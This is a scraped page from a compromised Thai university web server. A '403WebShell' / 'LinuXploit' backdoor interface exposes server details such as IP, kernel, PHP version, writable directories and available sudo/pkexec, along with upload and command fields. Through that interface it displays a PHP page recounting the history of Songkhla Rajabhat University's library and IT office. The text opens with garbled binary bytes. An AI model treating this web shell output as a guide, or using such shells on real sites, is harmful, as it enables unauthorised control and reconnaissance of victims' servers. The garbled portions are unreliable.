h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/history.php
<?php include 'header.php';?>

			<!-- testimonials -->
			<section class="testi text-center py-5" id="history">
				<div class="container pb-xl-5 pb-lg-3">
					<div class="title-section mb-sm-1 mb-1 pb-xl-1 text-center">
						<!--<h2 class="w3ls-title text-bl text-uppercase let font-weight-bold"><font color="#fc6183">โครงสร้างสำนักวิทยบริการฯ</font></h2>-->
						<h3 class="title text-uppercase text-center text-bl mb-5 pb-xl-1">ประวัติสำนักวิทยบริการฯ</h3>
					</div>
					<div class="row pb-4">
						<div class="col-lg-12">
								<p align="left">สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา พัฒนามาจากห้องสมุด และหอสมุดตามลำดับ ห้องสมุดแห่งนี้เดิมชื่อ ห้องสมุดโรงเรียนฝึกหัดครูสงขลา ได้จัดตั้งพร้อมกับการย้ายที่ตั้งของโรงเรียนฝึกหัดครูสงขลาจาก ตำบล คอหงส์ มาตั้ง ณ ที่ปัจจุบันในปี พ.ศ.2502 โดยมีอาจารย์สถิตย์ ศุปการ เป็นบรรณารักษ์ และมีหนังสือประมาณ 500 เล่ม โดยใช้อาคาร 1 เป็นที่ตั้งของห้องสมุด</p>
								<p>&nbsp;</p>
								<img src="images/history1.png" class="img-fluid" />
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2504 โรงเรียนฝึกหัดครูสงขลาได้ยกฐานะเป็นวิทยาลัยครูสงขลา เปิดสอนถึงระดับประกาศนียบัตรวิชาการศึกษาชั้นสูง (ป.กศ.สูง) จึงได้มีบรรณารักษ์ซึ่งมีวุฒิทาง บรรณารักษศาสตร์ คือ อาจารย์วรรณี เหล่าสุวรรณ และได้ย้ายห้องสมุดจากอาคาร 1 มาอยู่ ณ อาคาร 2 ห้อง 221</p>
								<p>&nbsp;</p>
								<p align="left">ในปี พ.ศ. 2506 นักศึกษาสนใจใช้ห้องสมุดมากขึ้น ทำให้สถานที่คับแคบ จึงได้ย้ายห้องสมุดใหม่ไปยังห้อง 229 และใช้ห้อง 228 เป็นที่ปฏิบัติงานของบรรณารักษ์ เมื่อมีนักศึกษามาใช้ห้องสมุดเพิ่มมากขึ้น และมีบรรณารักษ์เพียง 1 คน จึงได้เริ่มให้มีนักศึกษามาช่วยงานในหน้าที่บรรณารักษ์ด้วย</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2511-2512 อาจารย์สกุล นิลวรรณ อาจารย์ใหญ่วิทยาลัยครูสงขลาในขณะนั้น พิจารณาเห็นว่าห้อง 229 คับแคบเกินไปเมื่อเปรียบเทียบกับจำนวนผู้ใช้หอสมุด จึงจัดงบประมาณสำหรับต่อเติมชั้นล่างของอาคาร 2 เพื่อทำเป็นห้องสมุด และในขณะเดียวกันได้จัดงบประมาณสำหรับจ้าง เจ้าหน้าที่ มาปฏิบัติงานในห้องสมุดแทนนักศึกษาด้วย ประกอบกับมีการเปิดสอนภาคค่ำ จึงทำให้ห้องสมุดได้รับงบประมาณสนับสนุนเพิ่มมากขึ้น และมีจำนวนอาจารย์บรรณารักษ์เพิ่มขึ้น</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2516 รัฐบาลได้จัดสรรงบประมาณสำหรับจัดสร้างห้องสมุดเป็นอาคารเอกเทศ นับเป็นอาคารหลังที่ 7 ของสถาบัน และได้เปิดบริการในวันที่ 21 มีนาคม 2518 มีพื้นที่ 1,900 ตารางเมตร และมีที่นั่งอ่าน 200 ที่นั่ง และได้เปลี่ยนชื่อเป็น หอสมุดวิทยาลัยครูสงขลา ตั้งแต่ปี พ.ศ. 2518 เป็นต้นมาหอสมุดวิทยาลัยครูสงขลา ได้ทำหน้าที่เป็นศูนย์กลางในการศึกษาค้นคว้าของนักศึกษา อาจารย์ และชุมชน ด้วยดีตลอดมา มีเอกสาร ตำรา และวัสดุอื่น ๆ เพิ่มจำนวนขึ้นอย่างรวดเร็ว และมีการพัฒนาให้มีบริการที่ทันสมัยสมกับเป็นห้องสมุดสถาบันอุดมศึกษายิ่งขึ้น</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2536 ได้มีการนำโปรแกรมระบบงานห้องสมุดขององค์การศึกษาและวัฒนธรรมแห่งสหประชาชาติ (UNESCO) ชื่อ โปรแกรม CDS/ISIS มาใช้ในการสืบค้นบทความจากวารสาร โดยจัดให้มีการอบรมความรู้เกี่ยวกับการใช้โปรแกรมแก่อาจารย์และเจ้าหน้าที่ห้องสมุด และในปีนี้ได้มีการปรับปรุงสถานที่ โดยการติดเครื่องปรับอากาศ เพื่อให้นักศึกษาได้รับความสะดวกสบายในการศึกษาค้นคว้าในหอสมุด</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2537 เริ่มเปิดให้นักศึกษาสืบค้นข้อมูลจากวารสาร โดยใช้โปรแกรม CDS/ISIS ในเดือน พฤศจิกายน 2537</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2538 พระบาทสมเด็จพระเจ้าอยู่หัวได้ พระราชทานนามวิทยาลัยครูเป็น สถาบันราชภัฏ เมื่อวันที่ 14 กุมภาพันธ์ 2538 และหลังจากนั้นโดยอธิการบดี คือ ผศ. ดร. นิวัติ กลิ่นงาม ได้มีนโยบายปรับปรุงการบริหารหน่วยงานภายในสถาบัน จึงได้ยกฐานะหอสมุดวิทยาลัยครูสงขลาขึ้นเป็น สำนักวิทยบริการ สถาบันราชภัฏสงขลา โดยรวมงานเทคโนโลยีทางการศึกษาและหอสมุด เป็นหน่วยงานเดียวกัน อยู่ภายใต้การดูแลของผู้ช่วยอธิการบดีฝ่ายเทคโนโลยีสารสนเทศ</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2540 สำนักวิทยบริการ ได้นำโปรแกรมระบบงานคอมพิวเตอร์มาใช้กับบริการยืม-คืน สิ่งพิมพ์ โดยใช้โปรแกรม Microsoft Access และขณะเดียวกันได้มีการพัฒนาบริการโสตทัศนวัสดุขึ้นในหอสมุด โดยบริการยืมโสตทัศนวัสดุ ไปศึกษาที่บ้าน และเปิดบริการศึกษาจากโสตทัศนวัสดุเป็นรายบุคคลในสำนักวิทยบริการ</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2541 สถาบันได้รับงบประมาณแผ่นดิน เพื่อจัดสร้างอาคารสำนักวิทยบริการหลังใหม่ 6 ชั้น เป็นเงิน 37 ล้านบาท เพื่อรองรับการขยายกิจการของสำนักวิทยบริการ โดยก่อสร้างขนานกับอาคารหลังเก่า</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2542 สำนักวิทยบริการ ได้เปลี่ยนชื่อเป็น ศูนย์วิทยบริการ ตามนโยบายการบริหารหน่วยงานภายในของสถาบัน</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2541-2542 ศูนย์วิทยบริการได้รับงบประมาณแผ่นดิน จำนวน 1.8 ล้านบาท เพื่อจัดหาโปรแกรมระบบห้องสมุดอัตโนมัติ ศูนย์วิทยบริการ สถาบันราชภัฏสงขลา ได้ใช้โปรแกรมระบบห้องสมุดอัตโนมัติชื่อ Alice for Windows (AfW) โดยใช้กับงานทุกงานของศูนย์วิทยบริการ และให้บริการสืบค้นข้อมูลผ่านอินเตอร์เน็ต ตั้งแต่ปีการศึกษา 2543 เป็นต้นมา</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2544 ในภาคเรียนที่ 1 อาคารศูนย์วิทยบริการ 6 ชั้น ได้ก่อสร้างเสร็จและเริ่มให้บริการนักศึกษา โดยได้ย้ายหนังสือและบริการบางส่วนไปยังอาคารวิทยบริการ 6 ชั้น และได้ให้บริการเต็มรูปแบบ ในภาคเรียนที่2/2544 เป็นต้นมา
</p>
								<p>&nbsp;</p>
								<img src="images/history2.png" class="img-fluid" />
								<p>&nbsp;</p>	
								<p align="left">พ.ศ. 2544-2545 ศูนย์วิทยบริการเปิดบริการโดยใช้อาคาร 2 หลัง มีทางเชื่อมระหว่างอาคารชั้นที่ 1 และ 2 ศูนย์วิทยบริการ เป็นหน่วยงานสนับสนุนภารกิจของสถาบัน ได้มีการพัฒนาให้มีศักยภาพในการให้บริการทางวิชาการเพิ่มขึ้นอย่างต่อเนื่อง</p>
								<p>&nbsp;</p>	
								<p align="left">พ.ศ. 2545 สมเด็จพระพี่นางเธอเจ้าฟ้ากัลยาณิวัฒนา กรมหลวงนรานิวาสราชนครินทร์ พระราชทานนามอาคารบรรณราชนครินทร์ เมื่อวันที่ 16 ธันวาคม 2545 และเริ่มนำระบบประกันคุณภาพมาใช้ในการดำเนินงาน</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2546 ศูนย์วิทยบริการ มีการจัดทำคู่มือประกันคุณภาพ แผนกลยุทธ์ รายงานการประเมินตนเอง</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ. 2547 วันที่ 29 มกราคม 2547 มีการตรวจประเมินคุณภาพภายในเป็นครั้งแรก และในวันที่ 23 มิถุนายน 2547 มีการตรวจประเมินคุณภาพภายในเป็นครั้งที่ 2</p>
								<p>&nbsp;</p>
								<p align="left">พ.ศ 2548 ศูนย์วิทยบริการ ได้เปลี่ยนสถานะเป็นสำนักวิทยบริการและเทคโนโลยีสารสนเทศ ตามพระราชบัญญัติมหาวิทยาลัยราชภัฏ 2547 เมื่อวันที่ 9 มีนาคม 2548</p>
						</div>
					</div>
				</div>
			</section>
			<!-- testimonials -->


<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit